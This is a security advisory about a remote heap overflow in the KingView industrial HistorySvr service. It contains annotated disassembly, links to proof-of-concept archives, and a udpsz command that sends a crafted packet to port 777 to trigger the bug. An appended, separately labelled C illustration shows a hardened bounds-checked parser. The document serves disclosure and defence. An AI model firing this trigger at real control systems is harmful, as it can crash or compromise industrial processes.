#######################################################################

Luigi Auriemma

Application:  KingView
              http://www.wellintek.com
              http://www.wellintech.com/product-kingview.html
Versions:     nettransdll.dll <= 65.50.2010.18017
Platforms:    Windows
Bug:          heap overflow
Exploitation: remote, versus server
Date:         probably found 10 Feb 2011
Author:       Luigi Auriemma
              e-mail: aluigi@autistici.org
              web:    aluigi.org

#######################################################################

1) Introduction
2) Bug
3) The Code
4) Fix

#######################################################################

===============
1) Introduction
===============

"KingView is a powerful industrial software for monitoring & controlling
industrial processes."

#######################################################################

======
2) Bug
======

HistorySvr.exe is a service listening on port 777.
When handling opcode 3, the server allocates the destination buffer
using the 16-bit number of elements supplied by the client, then copies
the data using the size of the packet as the delimiter, so the copied
amount is not bounded by the allocation:

  00323E52 |. 66:8B7B 07       MOV DI,WORD PTR DS:[EBX+7]       ; get the 16bit number of elements
  ...skip...
  00323E6A |> 8BC7             MOV EAX,EDI
  00323E6C |. 25 FFFF0000      AND EAX,0FFFF
  00323E71 |. 8946 18          MOV DWORD PTR DS:[ESI+18],EAX
  00323E74 |. 7E 2D            JLE SHORT 00323EA3
  00323E76 |. 8D0C40           LEA ECX,DWORD PTR DS:[EAX+EAX*2]
  00323E79 |. C1E1 02          SHL ECX,2
  00323E7C |. 51               PUSH ECX
  00323E7D |. E8 89B80000      CALL 0032F70B                    ; allocate
  ...skip...
  00323EB5 |> 8B4E 54          /MOV ECX,DWORD PTR DS:[ESI+54]
  00323EB8 |. 8B6E 1C          |MOV EBP,DWORD PTR DS:[ESI+1C]
  00323EBB |. 8D7C03 F4        |LEA EDI,DWORD PTR DS:[EBX+EAX-C]
  00323EBF |. 83C0 0C          |ADD EAX,0C
  00323EC2 |. 8D0C49           |LEA ECX,DWORD PTR DS:[ECX+ECX*2]
  00323EC5 |. 8D4C8D 00        |LEA ECX,DWORD PTR SS:[EBP+ECX*4]
  00323EC9 |. 8B2F             |MOV EBP,DWORD PTR DS:[EDI]
  00323ECB |. 8929             |MOV DWORD PTR DS:[ECX],EBP      ; copy loop
  00323ECD |. 8B6F 04          |MOV EBP,DWORD PTR DS:[EDI+4]
  00323ED0 |. 8969 04          |MOV DWORD PTR DS:[ECX+4],EBP
  00323ED3 |. 8B7F 08          |MOV EDI,DWORD PTR DS:[EDI+8]
  00323ED6 |. 8979 08          |MOV DWORD PTR DS:[ECX+8],EDI
  00323ED9 |. 8B6E 54          |MOV EBP,DWORD PTR DS:[ESI+54]
  00323EDC |. 45               |INC EBP
  00323EDD |. 3BC2             |CMP EAX,EDX
  00323EDF |. 896E 54          |MOV DWORD PTR DS:[ESI+54],EBP
  00323EE2 |.^ 7E D1           \JLE SHORT 00323EB5             ; EDX is the size of the packet

#######################################################################

===========
3) The Code
===========

http://aluigi.org/testz/udpsz.zip
http://aluigi.org/poc/kingview_crc.zip

  udpsz -C "0010 03 0000 ffffffff 0100" -D -b a -L kingview_crc -T SERVER 777 0x1004

#######################################################################

======
4) Fix
======

http://www.zerodayinitiative.com/advisories/ZDI-11-351/

#######################################################################
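As an added illustration of the allocation/copy mismatch described in section 2 (this is not KingView's code and is not part of the advisory), the following C re-implements the opcode-3 element copy with the bound the original loop lacks. The 16-bit count at offset 7 and the 12-byte element size are taken from the disassembly; the element data starting at offset 9 and the header layout are assumptions.

```c
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

#define COUNT_OFF 7      /* 16-bit element count: MOV DI,WORD PTR [EBX+7] */
#define DATA_OFF  9      /* assumed: element array follows the count field */
#define ELEM_SIZE 12     /* LEA ECX,[EAX+EAX*2]; SHL ECX,2  ->  count*12 */
typedef struct { uint32_t f[3]; } elem_t;

/* Bytes the original loop would write past the allocation: it walks the
 * whole packet in 12-byte steps instead of stopping after `count` elements. */
size_t overflow_bytes(uint16_t count, size_t pkt_len)
{
    size_t avail  = pkt_len > DATA_OFF ? pkt_len - DATA_OFF : 0;
    size_t copied = (avail / ELEM_SIZE) * ELEM_SIZE;
    size_t alloc  = (size_t)count * ELEM_SIZE;
    return copied > alloc ? copied - alloc : 0;
}

/* Hardened parser: the allocation is still sized from the count field, but a
 * payload that is not exactly `count` whole elements is rejected up front.
 * Returns the number of elements stored in *out (caller frees), or -1. */
int parse_opcode3(const uint8_t *pkt, size_t pkt_len, elem_t **out)
{
    *out = NULL;
    if (pkt_len < DATA_OFF) return -1;
    uint16_t count = (uint16_t)(pkt[COUNT_OFF] | (pkt[COUNT_OFF + 1] << 8));
    size_t need = (size_t)count * ELEM_SIZE;      /* <= 65535*12, cannot wrap */
    if (pkt_len - DATA_OFF != need) return -1;    /* count and length must agree */
    if (count == 0) return 0;
    elem_t *buf = calloc(count, sizeof *buf);
    if (!buf) return -1;
    memcpy(buf, pkt + DATA_OFF, need);            /* bounded by the allocation */
    *out = buf;
    return count;
}

/* Constructed test packet: zeroed header, `count` at offset 7, then
 * `payload_len` bytes of element data. Returns parse_opcode3()'s result. */
int parse_constructed(uint16_t count, size_t payload_len)
{
    uint8_t pkt[DATA_OFF + 4 * ELEM_SIZE] = {0};
    if (DATA_OFF + payload_len > sizeof pkt) return -2;
    pkt[COUNT_OFF]     = (uint8_t)count;
    pkt[COUNT_OFF + 1] = (uint8_t)(count >> 8);
    elem_t *out;
    int n = parse_opcode3(pkt, DATA_OFF + payload_len, &out);
    free(out);
    return n;
}
```

overflow_bytes() only computes how far the unbounded loop would run past the buffer; it never performs the write.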